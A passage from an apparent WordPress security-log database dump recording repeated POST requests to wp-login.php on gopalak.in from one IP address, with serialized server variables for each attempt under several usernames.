mp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747059895.4159081;s:12:\"REQUEST_TIME\";i:1747059895;}}','13.127.208.15',1,'2025-05-12 19:54:57','2025-05-13 20:21:05'),(95725,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747059895.416579;s:12:\"REQUEST_TIME\";i:1747059895;}}','13.127.208.15',1,'2025-05-12 19:54:57','2025-05-13 20:21:04'),(95726,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747060284.7468541;s:12:\"REQUEST_TIME\";i:1747060284;}}','13.127.208.15',1,'2025-05-12 20:01:26','2025-05-13 20:21:05'),(95727,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747060284.660439;s:12:\"REQUEST_TIME\";i:1747060284;}}','13.127.208.15',1,'2025-05-12 20:01:26','2025-05-13 20:21:04'),(95728,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747060284.728869;s:12:\"REQUEST_TIME\";i:1747060284;}}','13.127.208.15',1,'2025-05-12 20:01:26','2025-05-13 20:21:04'),(95729,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"129\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"129\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747060284.6516941;s:12:\"REQUEST_TIME\";i:1747060284;}}','13.127.208.15',1,'2025-05-12 20:01:26','2025-05-13 20:21:05'),(95730,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747060284.6692791;s:12:\"REQUEST_TIME\";i:1747060284;}}','13.127.208.15',1,'2025-05-12 20:01:26','2025-05-13 20:21:04'),(95731,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"122\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"122\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747060676.261215;s:12:\"REQUEST_TIME\";i:1747060676;}}','13.127.208.15',1,'2025-05-12 20:07:58','2025-05-13 20:21:05'),(95732,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747060676.261812;s:12:\"REQUEST_TIME\";i:1747060676;}}','13.127.208.15',1,'2025-05-12 20:07:58','2025-05-13 20:21:05'),(95733,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747060676.263489;s:12:\"REQUEST_TIME\";i:1747060676;}}','13.127.208.15',1,'2025-05-12 20:07:58','2025-05-13 20:21:04'),(95734,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747060676.264293;s:12:\"REQUEST_TIME\";i:1747060676;}}','13.127.208.15',1,'2025-05-12 20:07:58','2025-05-13 20:21:04'),(95735,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\